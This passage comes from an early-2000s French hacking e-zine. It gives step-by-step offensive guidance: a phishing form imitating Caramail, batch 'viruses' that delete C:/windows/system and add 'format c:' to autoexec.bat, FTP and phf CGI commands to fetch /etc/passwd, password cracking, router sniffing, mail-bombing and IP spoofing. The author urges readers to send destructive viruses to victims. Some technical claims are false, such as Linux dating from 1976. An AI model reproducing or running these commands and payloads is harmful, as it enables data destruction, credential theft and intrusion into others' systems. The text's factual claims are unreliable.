des problèmes pour les raisons suivantes:
Raison: Temps dépassé.
Nous vous prions de réactiver votre compte en complétant
ce formulaire dans les plus brefs délais.
Mot de passe:
Retourner à La page de caramail.
© 2002 caramail. Tout droits réservés
Vous pouvez bien entendu, l'adaptez à votre guise en rajoutant par exemple le logo de Caramail pour faire plus crédible... Mais prenez garde, une nouvelle règle Caramail a été instaurée le 02/02/02 (ca sonne bien arf). Dixit: " Pour conserver la confidentialité de votre boîte aux lettres Caramail, ne révélez jamais votre compte et votre mot de passe Caramail, même si vous recevez un email venant soi-disant de l'équipe Caramail. Notre équipe de support n'a en aucun cas besoin de votre mot de passe pour vous aider sur Caramail. " Mouarf, j'étais plié quand j'ai vu ça... D'autant plus que la semaine qui précedait cette nouvelle règle, j'avais envoyé une bonne centaine de fake-mail... Arf, faut pas que je me sente visé non plus...lol Donc, avant d'envoyer un fake mail, prenez garde d'indiquer une adresse autre que la votre, avec une fausse identité... Sinon gare, vous pourriez vous faire choper :)) ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² ² 8°/Piratage d'un particulier: les virus ² ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² Bon là, je vais quand même pas vous rapeller ce que c'est qu'un virus... Qui ne s'est jamais heurté, au moins une fois dans sa cyber-vie, à ce douloureux problème? Je vous le demande... Est il possible de telecharger des virus sur le net, sans mettre hors service son pc? Ba oui, lancez donc une recherche vous verrez bien... Impressionant... Je vous déconseille les virus du type ILoveYou, c'est completement ridicule, prenez plutôt des virus qui font MAL plutôt que des vieux machins qui vous empechent la lecture de vos fichiers mp3...Qu'est ce qu'on s'en fout? lol Bon, avoir un virus c'est bien mais il faut savoir le maquiller et l'envoyer au plus grand nombre de personnes, et cela de manière anonyme. Pour ce qui est de l'anonymat, je ne maîtrise pas du tout et je ne suis jamais parvenu à envoyer un virus en étant completement anonyme. D'où l'interet d'envoyer des virus totalement destructeurs plutôt que des virus certes chiants mais pas fatals, qui permettront à l'utilisteur de pouvoir noter votre adresse e-mail... Au moins, quand le disque dur de votre victime est complètement niqué, y'a peu de chances qu'on vous retrouve. Mais parait qu'on peut envoyer des virus par mailbomber, ça non plus j'ai jamais essayé... N'étant pas un expert en virussologie, je vous propose quand même de programmer vos propres virus, sans passer par l'assembleur, tout simplement avec word pad... Après la création du virus, on le renommera en .bat pour qu'il puisse fonctionner. Je vous préviens à l'avance, les virus en .bat, je sais les programmer mais appliquer ce que je sais NON. Trop dangeureux, alors si votre pc est lui même infecté par le virus, n'allez pas me menacer en disant que c'est de ma faute. Je ne serai en aucun cas responsable, allez donc voir le disclaimer... Les virus en .bat sont interessants car aucun anti-virus ne semble pouvoir les detecter... La création d'un virus en .bat est très simple, suffit juste de connaître un peu ms-dos. Quelques commandes: echo off : desactive l'affichage de ce qui se passe echo on : active l'affichage echo. : saute une ligne. echo bonjour : affiche ce qui est écrit après echo (ici, bonjour). del : à votre avis??? :o copy : copier un fichier vers un repertoire. deltree : demander votre avis avant de supprimer. if .... : commande de condition. cd : se deplacer dans un autre repertoire valeur1/variable1 = valeur2/%variable2% : attribue une valeur/variable à une autre valeur/variable. dir c:/windows : affiche tout le contenu d'un repertoire (ici, windows). cls : efface l'écran. attrib : sert à mettre des attributs sur les fichiers, exemple: attrib +r +h c:\test.txt va mettre le fichier test.txt en attribut invisible et inmodifiable. pause : demande d'appuyer sur une touche pour continuer. start : demande d'executer un fichier. rem : insérer une remarque. commande>nul : executer une commande silencieusement. Voilà donc un de ces virus très dangeureux que vous pouvez faire: >echo off >echo bonjour >echo je suis un virus, programmé par [Kefka] >echo c'est quoi windows/system? >echo ca m'a l'air d'être dangeureux >echo je m'en occupe >pause >del C:/windows/system/*.* >echo voilà, c'est effacé, t'auras plus de problèmes mouarf >echo adieu!!! Mouarf, vous voyez quoi, ensuite vous enregistrez le fichier word, vous le renommez en .bat et si vous êtes tendance crasher, vous l'executer... :-) Après vous rajouter dans autoexec.bat la ligne de commande c:/votrevirus.bat pour qu'il puisse s'executer au démarrage du pc... On peut aussi créer des virus proposant plusieurs choix, avec un menu d'option, du genre: >@echo off >copy c:\windows\bureau\mitnick.bat c:\mitnick.bat >Attrib +r c:\mitnick.bat >Attrib +h c:\mitnick.bat >del c:\windows\bureau\mitnick.bat >REM ---This programm has been coded by [Kefka] >REM *** All right reserved*** >echo format c:>nul>>c:\autoexec.bat >cls >:menu >echo 1. editer un fichier >echo 2. lancer un scan >echo Q. Quitter >choice /c:12Q/t:Q,60/n Votre choix? >if errorlevel 255 goto erreur >if errorlevel 3 goto Quitter >if errorlevel 2 goto startscan >if errorlevel 1 goto editfile >if errorlevel 0 goto erreur > >:erreur >echo il y'a eu une erreur >pause >start c:\rundll32.exe user.exe,exitwindows > >:Quitter >echo aurevoir >goto erreur > >:startscan >start scandisk >goto erreur > >:editfile >edit >goto erreur > >@echo on Cool n'est ce pas? Laissez libre cours à votre imagination, mais faites gaffe quand même :-) . (à partir de ce modèle, je pense que vous n'aurez pas trop de problèmes à faire votre virus perso). Pour compiler vos créations, telecharger Power Batch. Voilà qui va clore ce chapitre sur la programmation de virus en .bat, ma fois très interessant. N'en abusez pas trop, ça peut être dangeureux arf. ²²²²²²²²²²²²²²²²²²²²²²²² ² 9°/Hack sous IRC/ICQ ² ²²²²²²²²²²²²²²²²²²²²²²²² Bon, on va s'éloigner un peu de la programmation avec un article pour les newbies de chez newbies lol. On va commencer par ICQ, ca sera plus simple. Donc, vous avez votre client ICQ, y'a un keum qui vous fait chier et vous voudriez bien usurper de son pseudo pour passer pour un con devant sa copine (s'il en a une ....). C'est très simple: Faites: >ICQ >Add/Change current user >Register a New User(ICQ#) Entrez donc toutes les informations concernant votre victime.Puis: >Change the Active User Et le tour est joué! Seul votre numéro ICQ diffère alors faites quand même gaffe... Bon, sinon je pourrais vous expliquer l'ip spoofing sous ICQ mais je prefere vous l'expliquer un peu plus loin, sinon on va croire que je me répète... Sous IRC, maintenant, c'est déjà plus facile. Supposons que vous soyez connectés sur irc.jeuxvideo.com . Allez sur le site de www.jeuxvideo.com et rentrez dans le dialogue en direct. Vous serez connectés sous deux identités différentes! De plus, vous pouvez à l'aide de votre client IRC, et sur irc.jeuxvideo.com, vous connecter avec des pseudos déjà reservés, ou avec des pseudos qui se rapprochent des vrais (quelle est la différence entre hack-man et hack-rnan selon vous? :-o ). Un truc chouette, avec les clients IRC, c'est le flood. Le flood consiste à envoyer un message, repeté ou non, sur un chat afin d'empecher les autres utilisateurs de chatter (du moins c'est ma version des faits lol). Les copier-coller conservent leur integralité! Selectionnez et copier le contenu de ce zine par exemple. Ouvrez votre client IRC, allez sur irc.jeuxvideo.com (mouarf décidément c'est ma cible préférée) et faites un coller avec ctrl+v... Effet garanti!!! arf... Bon je pourrais vous passer en revue les différentes commandes possibles sur irc, mais vous pouvez déjà les avoir avec un ptit /msg chanserv help, ou /msg nickserv help . Alors bon chat !!! ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² ² 10°/Architecture Linux (Unix) ² ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² Linux est un systeme d'exploitation qui a été crée en 1976, O.S très important puisque le réseau internet est entièrement constitué de machines linux. Linux est également un O.S très pratique pour hacker, bien que pas franchement indispensable, il n'en est pas moins important. Mais il présente un très grand problème: la sécurité , arf... Unix (ou linux c'est la même chose) est un système multi-utilisateurs, dont les utilisateurs ont plus ou moins de droits. Le plus interessant est le root, car il possède tous les droits. Quand vous penetrerez un système unix, vous tomberez sur plusieurs dossiers, sous dossiers, communs à toutes les machines tournant sous linux. Voilà un shéma illustrant le système de fichiers sur une architecure linux: |--/unix | |--/etc|--/passwd | |--/bin | |--/group | |--/profile | |--/utmp Systeme| |--/conf UNiX --| |--/motd en | etc... general| |--/dev |--/duke3d | | |--/tmp |--/jeu|--/command&conquer | | |--/lib |--/annuaire | | |--/usr|--/X|--/mail | | | | | |--/bin |--/celullaire | | | | | | |--/travail|--/plan-telephonique | | | | | |--/Y|--/travail | | | | | |--/mail | | | |-etc.... | |--/bin | --/root ou / Voilà maintenant une petite description du contenu de ces réperoires: /etc: se trouve a la racine du serveur ,il contient toute la configuration du système. Il y a dans ce dossier les fichiers définissant les droits des utilisateurs , la configuration du dns ,les partitions qui doivent être montées ,la liste des machines avec les quelles on s'autorise à converser. Si le dossier se trouve autre par qu'à la racine du disque, cela veut juste dire qu'il concerne les fichiers de paramétrage de la zone du dossier dans le quel etc se trouve. Tous les fichiers magiques représentant les différents types de hardware qui sont installés dans le serveur.Sous unix,la majorité des objets manipulable sont des fichiers. Ce rép permet de voir et de faire beaucoup de chose:exemple "voir"passer les paquets tcp/ip, ou parler au modem ou d'écrir sur le disque.Ce sont des programmes qui gère tout cela,car sinon ce serait vachement difficile. /bin et /sbin : le "s" devant bin veut dire qu'il s'agit de la version super user. Ce répertoire contient tout les binaires (dout son nom) qui servent à manipuler les différentes fonctionnalités du système. Il ne faut pas y toucher sous peine de tout foutre en l'air donc les crashers savent se qu'il doive supprimé. La suppression de ce fichier entraînerais que le système unix deviendrais imbootable. Encore une fois, on trouve ces dossier un peu partout sur le système unix, cela veut juste dire qu'il concerne la zone en question: /user/sbin représente une partie des codes binaires du super admin (si non il y aurais pas le "s"). Mais vous me direz c'est pas bin pour les user: car sans cette partie de code binaire du super user, le usr ne pourrais pas ce servir du serveur. /usr: c'est la ou se trouve tous les progs que vous avez installez mais ce répertoire concerne plus linux donc je ne m'attarderais pas sur ce sujet. /var: cette à cette endroit que l'on aura toute la partie variable du système.On y trouve tous les rèp suivant: log, spool, lock. Dans log , c'est la que tout ce que vous faites sur le serveur est loggé dout son nom "log", donc fichier a supprimé si vous le pouvez. Dans /var/spool: on trouve tous les fichiers en attendes de transfert , d'impression. Vous pouvez aussi trouvez les emails en attende de transfert. Donc pour les hackers c'est le top, profiter des négligences de l'admin ou de sa méconnaissance ,peut être a t'il oublié de mettre un accès restreint a ce répertoire... /tmp: Tous les fichiers qui sont susceptibles d' être effacés par le système ou par l'admin. On y trouve un peu de tout. Vous pouvez trouver un fichier passwd en cours d'utilisation ou de traitement. Ou encore des fichiers décodés. Donc c'est aussi un endroit a retenir. /mnt: Le plus souvent ,on n'y trouve tous les lecteurs disquettes et cd rom. On peux aussi avoir accès a un disque dur d'une machine du réseau local du serveur, et les droits d'accès à ces disques durs peuvent être négligé. Donc aussi un rép a pas oublier. /lib: Un endroit stratégique ,le droit d'écriture est toujours réservé au super user. On y trouve des codes binaires parfois prl et tcl. Cette endroit est bien protégé parce que il suffit d'imaginer ce qu'il se passerait si quelqu'un était en mesure de remplacer une librairie très commune et anodine par une autre ayant exactement les memes fonctionnalités mais qui, en plus contiendrait un cheval de Troie... Etudions maintenant les principales commandes Linux . ls : cette commande vous permet d'avoir plus d'informations sur un repertoire ou un fichier exemple: >ls etc >d rwxr-x--- root skipass 10000 05/02/02 18:50 passwd >d rwxr-x--- root skipass 12000 05/02/02 18:51 group > 1 2 3 4 5 6 7 8 Et voilà à quoi correspondent ces differentes parties: 1 : le type de fichier : il en existe trois : -les repertoires -les fichiers ordinaires (textes, courriers, source de programmes,.exe,etc.) -les fichiers speciaux (pour la gestion du systeme, donc interressant) 2 : le bit de droit d'acces: il se divise en trois partie de trois caracteres (il y'a neuf caractères) La premier partie concerne le propio du file (u) La deuxieme partie concerne le groupe du proprio (g)(avec lequel il travaille) La troisieme concerne un utilisateur externe au groupe.(o) Dans les trois cas il existe trois droit d'acces qui sont designe par trois lettre respective : r : droit de lecture (Read) w : droit d'ecriture (Writte) x : droit d'execution (eXecute) le - indique qu'il n'y a aucun droit accorde 3 : le proprio du file 4 : le groupe auquel le proprio appartient ou travaille 5 : memoire en ko 6 : la date de la derniere lecture 7 : l'heure de la derniere lecture 8 : le nom du fichier cat: cette commande vous permet de lire les fichiers txt, si vous en avez la permission naturelement. ;-) cd: cette commande vous permet de changer de repertoire. get: cette commande permet de récuperer un fichier mget: cette commande permet de récuperer le contenu d'un répertoire cp: cette commande vous permet de copier un fichier. del: cette commande vous permet de supprimer un fichier. rmdir: cette commande vous permet de supprimer un répertoire. mkdir: cette commande vous permet de créer un répertoire. get: cette commande vous permet de transférer un fichier du serveur jusqu'à votre bureau pwd: cette commande vous permet de savoir dans quel répertoire vous êtes. dir: cette commande vous permet d'accèder au contenu d'un répertoire. put: cette commande vous permet d'envoyez un fichier au serveur. mput: cette commande vous permet d'envoyez une liste de fichiers au serveur. cd/: cette commande vous permet d'aller à la racine du serveur. cd..: cette commande vous permet de retourner au repertoire parent. disconnect: cette commande vous permet de vous déconnecter du serveur. who: cette commande vous permet de savoir quels sont les utilisateurs connectés. write: cette commande vous permet de "chatter" avec un des utilisateurs connectés. Voilà, c'est a peu près tout ce qu'il faut savoir à propos d'Unix. Cela vous suffira amplement quand vous tenterez d'attaquer un site quelconque... A propos de hack de site, justement nous y voilà :-)) ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² ² 11°/Piratage d'un site: introduction ² ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² Bon, vous allez me dire que vous le savez déjà, mais je vous le redis, le piratage est sévèrement puni... Alors, si vous arriver à avoir accès aux données d'un site, ne faites pas le con, au maximum vous modifiez la page d'accueil du site mais c'est tout! Pas de crash, je vous fais confiance... Surtout si vous vous attaquer à un provider ou à un site d'état, là vous êtes vraiment dans la merde... Vous serez vite tracés et vite reperés, soit vous aurez un avertissement très sévère ou bien vous aurez le droit à une sanction juridique! Je vous rapelle pour mémoire que je ne serais en aucun cas responsable de ce que vous pourrez faire avec ces informations. C'était juste histoire de remettre les point sur les i... Bon, si vous voulez vous attaquer à un site, il vous faudra d'abord rassembler le maximum d'informations sur lui. Un très bon outil est fait pour ça il s'agit de WSpingProPack, disponible entre autre sur http://www.ipswitch.com . N'hésitez pas à rassembler vos informations sur un bloc-notes afin de pouvoir les avoir à votre portée, en cas de necessité! Voilà donc un petit listing du matériel que vous devez avoir avant de commencer un hack: -WsPingProPack, ou si vous ne l'avez pas utiliser des comandes DOS pour parvenir à vos fins (tracert www.nomdusite.com ; ping -A www.nomdusite.com ). -Un bon crackpass (VcrackFTP devrait convenir). -Un decrypteur pour Unix (genre Jack The Cracker). -Un client FTP genre Ftp explorer -Une légère conaissance de Linux. -Une feuille avec toutes les informations sur le site. -Un sniffer (pas dans tous les cas) -Une bonne notion des exploits et de la programmation (pas dans tous les cas) -Une mitraillette MP5, pour vous proteger si les flics débarquent chez vous, arf non je deconne... :)) -Une conscience... Vous avez tout le matos? Oki c'est parti mon kiki :-D ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² ² 12°/Piratage d'un site: hack par ftp ² ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² Nous allons plus particulièrement nous interesser à deux cas de figures. L'un dans le cas d'un serveur peu protegé, l'autre dans le cas d'un serveur mieux protegé. On commence... // Dans le cas d'un serveur peu protegé: Prenons comme exemple le site de skipass.com. Avec WSPINGPROPACK, on récupere les noms des contacts (dans l'onglet "infos") : "Administrative Contact, Technical Contact, Billing Contact:Sellimoutou, Marina (MS4651) noc@VERIO.FRVERIO FRANCE". Alors, on constate deux noms d'users, Sellimoutou et Marina. Ouvrez donc votre client FTP entrez l'adresse du site et dans profile name et login entrez le nom d'un de ces utilisateurs avec comme mot de passe l'adresse noc@VERIO.FR (le plus souvent le mot de passe sera une adresse e-mail si le serveur est mal configuré bien entendu) . Et si cela ne marche pas (c'est le cas ici) sortez VcrackFTP et testez toutes les Wordlist que vous pourrez... Bon courage !!! // Dans le cas d'un serveur mieux protegé: Allez sous DOS et tapez: >ftp >open www.nomdusite.com >quote user ftp >quote cwd ~root >quote pass ftp Cet exploit vous donnera soit l'accès root (le root est l'utilisateur qui a le plus de droits sur un systeme unix), ou soit un accès anonyme sur le serveur. Comme cela sera très certainement le cas, restez sous DOS et tentez de récuper le fichier passwd. Tapez: >get etc/passwd Le repertoire dans lequel est placé ce fichier varie selon l'O.S (systeme d'exploitation) du serveur. Voici donc une liste de ces répertoires: Os > Répertoire dans lequel passwd est caché ----------------------------------------------------------------- AIX3 > etc/security/passwords A/UX 3.Os > tcb/files/auth BSD4.3-Reno > etc/master/passwd ConverOs 10 > etc/shadow DG/UX > etc/tcb/aa/user EP/IX > etc/shadow HP-UX > secure/etc/passwd IRIX 5 > etc/shadow Linux 1.1 > etc/shadow SCO Unix#.2.x > tcb/auth files/r/root SunOs 4.1+c2 > etc/security/passwd/adjunct SunOs 5.0 > etc/shadow System V 4.0 > etc/shadow System V 4.2 > etc/security Ultrix 4 > etc/auth/[.dir|.pag] UNICOS > etc/udb Hem, hem, ba voilà... Ne croyez cependant pas que le tour est joué. Le fichier passwd atterira sur votre bureau. Là, il y'a 2 possibilités, soit le fichier est crypté, soit il est en shadow. Si il est crypté, vous aurez un truc du genre "root: 1fd5s1: 0: 1: Superuser" , prenez donc Jack The Cracker ou tout autre decrypteur de pass Unix, et attendez... Patience :)) S'il est en shadow (en étoile), ce qui nous donne quelque chose comme "root:x:0:1:Superuser", cela veut dire que le vrai fichier passwd se trouve dans un autre répertoire, qui varie donc selon l'O.S, vous avez compris... :) Quand vous aurez les pass, utilisez comme login le nom d'un des users, comme on a vu tout à l'heure. (ou alors mettez comme login: root) Si l'accès anonyme ne vous est pas autorisé, cherchez d'autres failles possibles à exploiter... Et passez donc à la suite. :-) ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² ² 13°/Piratage d'un site: exploiter les failles Wingate ² ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² Certains serveurs tournant sous Windows NT présentent des failles très interessantes pour les hackerz...Le port de Wingate est le 8010. Essayez donc de taper sur votre navigateur ceci: >http://www.urlNT.com:8010/c:/ Cette faille peut vous permettre de vous faire passer pour un ordinateur connecté au réseau et donc d'avoir accès à tous les dossiers du serveur... Très cool. Sinon, essayez par Telnet, entrez comme adresse: >wingate>www.url.com Soit vous aurez directement accès au contenu des ordinateurs, soit le serveur vous demandera un login et un mot de passe. Reportez vous donc au chapitre Hack par Telnet pour passer cette protection :p ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² ² 14°/Piratage d'un site: exploiter les failles CGI ² ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² Certains serveurs vous permettent d'accèder au fichier passwd directement dans la barre d'url en tapant >www.nomdusite.com/etc/passwd Cela ne marche que très rarement, mais vous pouvez aussi tenter d'autres adresses, si le site utilise le php: >http://www.nomdusite.com/cgi-bin/php.cgi?/etc/passwd Ou si le site utilise le phf: >http://www.nomdusite.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Mais nous allons plutôt nous préocupper des faiblesses php, qui nous permettront de récupere les passwd de l'administrateur d'un forum d'un site qui utilise le php. Donc nous avons un site quelconque, qui possède un forum en php3. Tentez pour commencer d'accèder aux stats du sites: >http://www.nomdusite.com/stats Si l'accès n'est pas protegé, c'est du gateau, allez sur les stats ftp: >http://www.nomdusite.com/stats/ftp Vous obtiendrez alors les url de certain fichiers, censés être cachés, dont certains ont une importance. Essayez d'accèder à ces fichiers, et cherchez le mot de passe de l'administrateur du forum, placé dans le fichier config.txt. Il vous faut mainteant vous logger en tant qu'administrateur. Sur la page d'accueil du forum, vous notez l'adresse, http://www.nomdusite.com/forum/index.php3. Chaque message contient un numéro et la lecture fonctionne comme ceci: message.php3?num=21. Il y'a donc une variable num. Nous allons maintenant chercher la variable d'administration, essayez donc : >http://www.nomdusite.com/forum/index.php3?admin=passwd Vous serez donc loggé en tant qu'admin. Cette faille est assez rare mais vaut vraiment qu'on essaye de l'exploiter. De plus, il arrive que le mot de passe de l'admin du forum soit le même que celui du site. ;-) Bonne chance !!! ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² ² 15°/Piratage d'un site: hack par Telnet ² ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² Conditions nécessaires: -Que vous ayez Telnet -Que vous ayez un bon cracker de mot de passe -Que vous ayez beaucoup de chance :op Certains sites disposent d'un accès Telnet. Si Telnet est mal configuré vous pouvez facilement accèder au contenu du serveur d'un site. Ouvrez donc Telnet, Démarrer/Executer et tapez telnet.exe. Mettez le nom du site dans nom d'hôte, laissez le port Telnet et connectez vous. Si tout se passe bien, vous aurez accès au serveur, et on vous demandera un login et un mot de passe. Si le serveur est mal configuré, vous n'aurez pas besoin de mot de passe. Mettez donc come login le nom du site ou le nom d'un de ses webmasters (récuperés avec WsPingProPack). Si le serveur réclame un mot de passe, utilisez un bon cracker de mot de passe et ayez beaucoup de patience... U tilisez la commande "help" pour avoir la liste des commandes possibles. Voilà !!! :)) ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² ² 16°/Piratage d'un site: comment s'attaquer à un routeur ² ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² Conditions nécessaires: -Que vous ayez Telnet -Que vous ayez WsPingProPack -Que vous ayez un bon sniffer -Que vous fassiez très attention... Rappelons tout d'abord la définition d'un routeur: Un routeur est un disposiif matériel qui permet d'envoyer et de reçevoir des données depuis un réseau. L'intêret de s'attaquer un routeur, c'est qu'en devenant routeur, on peut ainsi changer l'adressage du réseau et intercepter des informations top-secretes... Mais bon fantasmez pas trop là... :p Pour trouver l'adresse IP d'un routeur afin de pouvoir s'y connecter, il faut déjà connaitre l'adresse IP du réseau. Bon alors on au site dont l'ip est: 45.12.38.20 (je dis n'importe quoi là mais c'est qu'un exemple) . Alors tout ce qui nous interesse dans cette ip, vous l'aurez compris, c'est l'adresse du réseau, 42.12.38 . Sortez donc WsPingProPack, on va scanner tout ce qui est sur le réseau. Lancez donc un scan sur SNMP, on obtient donc une liste d'adresse IP, celles des routeurs miam miam... Connectez vous donc au routeur par Telnet. Pour le login, prenez les noms des webmasters du site et pour les passwords, prenez votre sniffer et attendez que quelq'un se logue sur le routeur... Surtout faites TRèS attention, chaque connection est enregistrée avec votre IP. Donc mettez en oeuvre différentes techniques de spoofing pour pas qu'on vous repère. Sinon, vous allez passer une bonne partie de votre vie à dormir à prison... ;-(( ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² ² 17°/Piratage d'un site: approche de script kiddie ² ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² La question qui vous mord les lèvres: Qu'est ce qu'un script kiddie? On désigne par ce terme les pirates qui s'introduisent sur un serveur, au moyen d'exploits, visant à acquérir l'accès root, (NDLR: le plus souvent en langage C) sans en connaître la signification. Devenir sk (abréviation de script kiddie :-o)) est une chose très interessante pour les newbies car cela nécessite très peu de conaissances. Comment donc procéder pour attaquer un serveur, en étant script kiddie? La première étape consiste à trouver l'O.S du serveur. Ouvrez une fenêtre DOS et tapez : >ftp >open www.nomdusite.com (ok je sais c'est du déjà vu mais bon...) Dans la plupart des cas le serveur se présentera à vous, sinon trouvez une autre méthode. (linux est très utile pour trouver un O.S.) La seconde étape consiste à chercher des exploits, exploitant les faiblesses du serveur. Ces exploits varie donc selon son O.S. Vous en trouverez plein sur le net avec ftpsearch. Vous pouvez également aller sur http://www.rootshell.com y'en a plein là bas aussi. La dernière étape est de compiler cet exploit sur le serveur afin de devenir root (le plus souvent les exploits servent à ça). Il vous faudra donc d'abord créer un compte sur le serveur puis y placer votre exploit pour ensuite le compiler sur le serveur et enfin l'executer. Puis après, vous êtes le master du systeme, pas besoin que je vous dise les differents trucs que vous pouvez faire en étant root, les idées viendront bien toutes seules :)) Bon, c'est cool tout ça, mais qu'est ce que ca fait de plus un vrai hacker? Simple, il fait tout ce que les sk ne font pas, c'est à dire détecter les failles du serveur et utilisez des exploits crées par eux mêmes, ou alors simplement les comprendre, les maîtriser (je sais c'est dur...) Certes, on arrive au même résultat, mais un sk se soucie guère des programmes qu'il utilise. La seule différence entre le sk et le vrai hacker est le niveau de programmation... :p Ca peut paraître très chiant mais sans la programmation, vous ne serez jamais un grand hacker... (voir chapitre 21) NB: Avoir un root sur un systeme c'est chouette mais il va falloir faire un backdoor (traduction: porte de derrière) pour pouvoir cacher votre root et pour revenir sur le serveur quand vous voulez. (voir chapitre 20) ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² ² 18°/Comment cacher son identité sur le net: les mails anonymes ² ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² Là vous avez deux solutions : - avec un mailbomber - avec Telnet Ces deux méthodes ne fonctionnent que sur des serveurs du type mail.domaine.com (par exemple mail.hotmail.com). Bon, commençons par le mailbomber. Je vous conseille de prendre le mailbomber de Socket23, qui est un trojan. Ouvrez le et dans "serveur de la messagerie" mettez mail.domaine.com puis indiquez l'email de la victime. Mettez ensuite votre adresse mail (une fausse bien entendue :p) et indiquez le nombre de messages à envoyer (NDLR:il n'y a pas de limites...) et connectez vous. Simple et efficace ... :)) Maintenant pour ceux qui veulent faire plus compliqué vous pouvez aussi en envoyer par Telnet. Ouvrez donc Telnet indiquez le serveur de la messagerie, mail.domaine.com, entrez le port 23 et connectez vous. Puis tapez : (NB: ce que vous tapez n'apparaît pas à l'écran) >helo mail.domaine.com Ceci devrait présever votre anonymat. (certains serveurs n'acceptent pas cette commande). Tapez maintanant >mail from: n'importequi@n'importequoi.com (votre fausse email) >rcpt to: victime@domaine.com (indiquez là l'adresse de votre victime) >data Puis tapez votre message, sans oublier de mettre un point à la fin. Voilà !!! Si vous voulez pas vous prendre la tête avec ces méthodes, telechargez anonymizer, c'est plus sûr et plus efficace. :)) ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² ² 19°/Comment cacher son identité sur le net: le spoofing ² ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² Le spoofing sert à cacher son adresse IP sur Internet, en en prenant une autre. C'est plus facile à dire qu'à faire... Etudions les différentes techniques de spoofing: -Le spoofing sous IRC: Oui, je sais, on ne peut pas vraiment parler de spoofing ici vu que cette tecnique consiste en fait à utiliser un serveur proxy wingate pour prendre une autre ip. On va donc chercher un serveur wingate, en faisant un scan de port sur le port 23, et on va tenter de se connecter : > /serveur ip_wingate 23 Exemple : > /server 80.9.32.58 23 Mirc va alors vous écrire les commandes suivantes: >*** Connecting to 80.9.32.58 (23) >Local host: KefKa (80.9.33.245) >ÿû ÿûÿýWinGate>NICK endrix >Connecting to host NICK...Host name lookup for 'NICK' failed >USER us1 "usmachine" "80.9.32.58" ident >Connecting to host USER us1 usmachine"80.9.32.58" ...Host name lookup for ' USER >RhylKim "rhylmachine" "80.9.32.58" ' failed Une fois votre ip spoofée auprès d'irc il va falloir vous reconnecter car la précédente manip vous a déconnecté. et pour ça vous allez faire: /raw nom_du_serveur port_irc Par exemple : > /raw irc.jeuxvideo.com 6666 Mirc va alors vous écrire les commandes suivantes: >jeuxvideo.com rg "usmachine" "80.9.32.58" ...Host name lookup for ' >USER >us1 "usmachine" "80.9.32.58" ' failed >Connecting to host irc.jeuxvideo.com ...Connected Maintenant les formalités: votre nick: /nick votre_nick Dans notre exemple: /nick us1 puis: >/user ident x x full_name Dans notre exemple: > /user ident x x usmachine Voilà c'est bon votre adresse ip est spoofée sur mirc. Si quelqu'un fait un /dns ou un whois sur vous, c'est l'adresse ip spoofée qu'il verra et non le vôtre. Les modéros ne pourront donc plus vous bannir, libre à vous de faire ce que bon vous semble. -Le spoofing sous ICQ: Il existe de nombreux programmes pour spoofer son IP sur ICQ. Cependant, il existe une méthode simple, bien qu'elle ne marche pas à tous les coups. Pour commencer, prenez l'IP de quelqu'un, ouvrez ICQ, puis allez dans "préferences", "serveur" et changez le serveur qui est noté par icq. mirabilis.com et laissez icq1.mirabilis.com. Après ça reconnectez vous sur ICQ allez dans "security privacy" et enlevez le "do not IP publish". Vous serez ensuite spoofé... :)) -L'IP spoofing: Bon, là, c'est déjà plus compliqué...La mascarade d'adresse IP ou ip spoofing permet a une machine du réseau extérieur de se faire passer pour une machine du réseau intérieur et ainsi de profiter de tous ses droits. L'attaquant donne a son ordinateur l'adresse IP d'une machine appartenant au réseau interne. Donc, si vous voulez vous attaquez à un ordi dans un réseau protégé par un firewall, vous allez devoir envoyez un paquet d'ip contenant une adresse IP d'un des postes du réseau. Le firewall va donc laisser passer le paquet ip car il reconnaîtra une adresse appartenant au réseau !!! Pour que vous puissiez être spoofé sur un réseau, va falloir créer sur le serveur un fichier *.rhost, je parlerais peut être des fichiers rhost dans un autre e-zine, patience... Bon voilà, vous pourrez également trouver en télechargement sur le net des programmes permettant de vous spoofer, mais également des blooffers, des brouilleurs d'ip. Cependant ces derniers sont très facile à détourner, et pas franchement efficaces. Optez donc plutôt pour le spoofing. :-) ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² ² 20°/Comment cacher son identité sur le net: l'après root ² ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² Prenons une situation simple. Vous venez d'obtenir l'accès root sur un serveur quelconque, et cet accès, si durement acquis, vous aimeriez bien le garder afin que vous puissiez revenir quand 